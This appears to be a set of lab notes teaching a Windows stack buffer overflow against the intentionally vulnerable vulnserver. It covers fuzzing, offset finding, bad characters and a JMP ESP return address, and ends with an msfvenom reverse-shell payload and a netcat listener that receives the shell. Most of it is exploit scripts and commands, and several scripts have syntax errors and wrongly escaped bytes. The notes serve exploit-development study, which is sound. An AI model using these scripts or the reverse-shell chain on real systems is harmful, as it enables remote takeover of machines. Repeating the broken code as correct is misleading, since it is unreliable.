Programs needed:
– Windows
– Immunity Debugger

The Stack:
Extended Stack Pointer (ESP)
Buffer Space
Extended Base Pointer (EBP)
Extended Instruction Pointer (EIP)
Return Address

The Process:
1 Spiking
2 Fuzzing
3 Finding the Offset
4 Overwriting the EIP
5 Finding Bad Characters
6 Finding the Right Module
7 Generating Shellcode
8 Gain Root Access

To Dos:
On Windows
– Turn off Real-time protection
     – This is because of Windows Defender
– Turn off Virus & threat protection
– Download ‘vulnserver.exe’ onto Windows
     – found on GitHub, google vulnserver
     – Download and install ‘Immunity Debugger’
     – from Immunity Inc.
     – can run a program through the debugger
     – after triggering exploit, can see results
     – Don’t need to give them real info to download
– Run vulnserver as admin
– Run Immunity as admin

Immunity:
– File –> Attach
– look for vulnserver, attach
– Hit the play button on top

Kali:
– Connect to vulnserver
$ nc -nv <vulnserver_IP> 9999          # 9999=port
$ HELP
     – see the commands that are possible
$ STATS is used to spike
     # this is an example usage
     $ ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
     # this command is used to send the .spk file
$ TRUN is the most important part of Spiking
     – same as the STATS, but change the file to trun.spk
     – it throws a bunch of characters to see if the program crashes
– it should show the usage

1. SPIKING:
stats.spk / trun.spk
     – needed to initiate the spike
     – put these three lines in a text called stat.spk
         s_readline();
         s_string(“STATS “);
         s_string_variable(“0”);
     – send this to the vulnserver
$ generic_send_tcp <target IP> 9999 stats.spk 0 0
$ generic_send_tcp <target IP> 9999 trun.spk 0 0
     – the trun.spk made the vulnserver crash
     – we hit a vialation
– look at the registers to see what happened
     – EBP shows 41414141, which is all ‘A’s
     – we need to get the EIP with 41414141
– EIP will give us control

2. FUZZING:
We know that trun is vulnerable… so we’ll use that one
As admin – reboot the vulnserver, and immunity… then reattach
create a python script for fuzzing

——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————-SCRIPT 1——————————–

#!/usr/bin/python
import sys, socket
from time import sleep

buffer = “A” * 100

while True:
     try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect ((‘192.168.1.90’,9999)) #vulnserver IP address

     s.send((‘TRUN /.:/’ + buffer))
     s.close()
     sleep(1)
     buffer = buffer + “A”*100

     except:
     print “Fuzzing crashed at %s bytes” % str(len(buffer))
     sys.exit()

———— BUFFER OVERFLOW PYTHON SCRIPT ————–

chmod +x script1.py
Kali:
$ ./script1.py

– watch Immunity for the crash, then ^c the script
– need to know approx where we crashed (around 3000 bytes)
– need to find where we get to the EIP

FINDING THE OFFSET:
– looking for where we overwrite the EIP
     – There is a tool by metaspoloit called ‘Pattern Create’
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
     – l is for length because we found around 2700 bytes is where vulnserver crashed
     – run the program, and copy the output
– modify the script [see below] by pasting the value to offset as a variable
– change variable buffer to offset and assign it the output
– rename script to script2.py
– this should give us a value of the EIP

chmod +x script2.py
Kali:
$ ./script2.py
     – output shows us getting to the EBP, but not EIP
     – use metasploit to send the pattern_offset.rb, but with a ‘-q 386F4337’ at the end
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337
     – it should find “Exact offset match at 2003”
– at 2003 bytes, we should be able to control the EIP

——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————-SCRIPT 2——————————–

#!/usr/bin/python
import sys, socket

offset = “<insert copied output of patern_create.rb>”

try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
     s.send((‘TRUN /.:/’ + offset
     s.close()

     except:
     print “Error Connecting to Server”
     sys.exit()

———— BUFFER OVERFLOW PYTHON SCRIPT ————–

OVERWRITE THE EIP:
– the EIP is 4 bytes, so we want to overwrite those after the 2003 bytes before it
– modify script2.py
– delete the offset variable
– write shellcode as the variable
– shellcode = “A” * 2003 + “B” * 4

——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————-SCRIPT 3——————————–

#!/usr/bin/python
import sys, socket

shellcode = “A” * 2003 + “B” * 4

try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
     s.send((‘TRUN /.:/’ + shellcode
     s.close()

     except:
     print “Error Connecting to Server”
     sys.exit()

———— BUFFER OVERFLOW PYTHON SCRIPT ————–

– chmod +x for script3.py
     – it should break the program with an access vialation
Kali:
$ ./script3.py
     – EBP came through as 41414141
     – EIP is now 42424242
– this means we control the EIP

FINDING BAD CHARACTERS:
– We need to know what characters are good for shell code and which are bad
– we can run all the hex characters through the program and see what acts up
Google
     – look for ‘bad chars’
     – Bulb Security comes up
     – can copy/paste the bad chars that it gives
     – there is a null-byte at the beginning ‘x00’ that can be deleted
– change your script now to add bad chars as a variable
– these are every hex characters that we can run through the program
– parse all through the program, and see what looks funny

 

——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————–SCRIPT 4——————————-

#!/usr/bin/python
import sys, socket

badchars = (“<paste from bulbsecurity>”)

shellcode = “A” * 2003 + “B” * 4 + badchars

try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
     s.send((‘TRUN /.:/’ + shellcode
     s.close()

     except:
     print “Error Connecting to Server”
     sys.exit()

———— BUFFER OVERFLOW PYTHON SCRIPT ————–

– chmod +x for script4.py
– fire off the program
– should break the program
– we are interested in the hex dump now
     – at the ESP, right click on the hex, and select ‘follow in dump’
– the last thing we sent is FF, so we’re looking for the bad char
     – if there was a bad char, it would be out of place… 10, 11, 12, 14
     – 13 would be the bad character
     – if we see something instead of the normal character, that’s the indicator
– write each one of these bad characters down
     – these will be used to gain root

FINDING THE RIGHT MODULE:
– we are looking for a .dll (or other files) that has no protections
Google
     – mona module (find mona.py)
     – This PC / Local Disk / Program Files x86 / Immmunity Inc / Immunity Debugger / PyCommands
     – Paste it to this location
– now we can use the bottom white bar in Immunity to type commands
– type: !mona modules
     – it will show a green blob of greatness
     – we are looking for the protection settings (example: false, false, false, true, false)
     – looking for all falses, and attached to the vulnserver, essfunk.dll stands out…
– we are about to find the op code equivilant of a jump
Kali:
$ locate nasm_shell
     – use the result, and copy/paste to command line
$ nasm > JMP ESP
     … FFE4 …
– go back to immunity
– on bottom white area, type: mona find -s “xff/xe4” -m essfunc.dll
     – we are looking for return addresses
     – write down the address
– Kali – exit out of nasm
– open the python script… we don’t need the bad characters anymore
– now we’ll write in the return address

 

——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————SCRIPT 5———————————

#!/usr/bin/python
import sys, socket

# 625011af       #this is the return address

shellcode = “A” * 2003 + /xaf/x11/x50/x62     #this is in reverse of the return address

try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
     s.send((‘TRUN /.:/’ + shellcode
     s.close()

     except:
     print “Error Connecting to Server”
     sys.exit()

———— BUFFER OVERFLOW PYTHON SCRIPT ————–

– this script will give us a jump point
– open immunity again…
– click on the blue arrow next to the play button at the top
– enter the jump code
     – it should find the ESP with that code, hit F2 to set a break point
     – this will overflow the buffer, but will pause the program for further instruction
– hit play
Kali:
– chmod +x for script5.py
$ ./script5.py
     – it shows a break point at EIP
– now generate shell code, and execute it

GENERATING SHELL CODE / GETTING ROOT:
– use msfvenom to generate shell code
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.20.131 LPORT=4444 EXITFUNC=thread -f c -a x86 -b “\x00”
     – p is payload
     – we’re providing our info because it’s a reverse shell
     – EXITFUNC just makes the exploit more stable
     – f is file type, for c code
     – a is the type architecture
     – b is for bad characters (this is where we would put them in)
– copy/paste the results into the python script that we’ve been using
– take note of payload size because of limited space

 

——— BUFFER OVERFLOW PYTHON SCRIPT ———–
—————————SCRIPT 6———————————

#!/usr/bin/python
import sys, socket

overflow = (<copy/paste output of msfvenom>)

shellcode = “A” * 2003 + “/xaf/x11/x50/x62” + “\x90” * 32 + overflow #\x90 is the nops

try:
     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((‘192.168.1.90’,9999)) #vulnserver IP address
     s.send((‘TRUN /.:/’ + shellcode
     s.close()

     except:
     print “Error Connecting to Server”
     sys.exit()

———— BUFFER OVERFLOW PYTHON SCRIPT ————–

 

– the shellcode will submit 2003 bytes to get to the EIP, then it will jump to the set of instructions we provide
– overflow is the extra instructions
– we will need some padding called ‘nops’ (\x90) known as a no-operation
– it’s pad space between jump command and overflow

Kali:
– set up netcat
$ nc -nvlp 4444
– run vulnserver again as admin
– run the script
– go to netcat, and now there is a shell!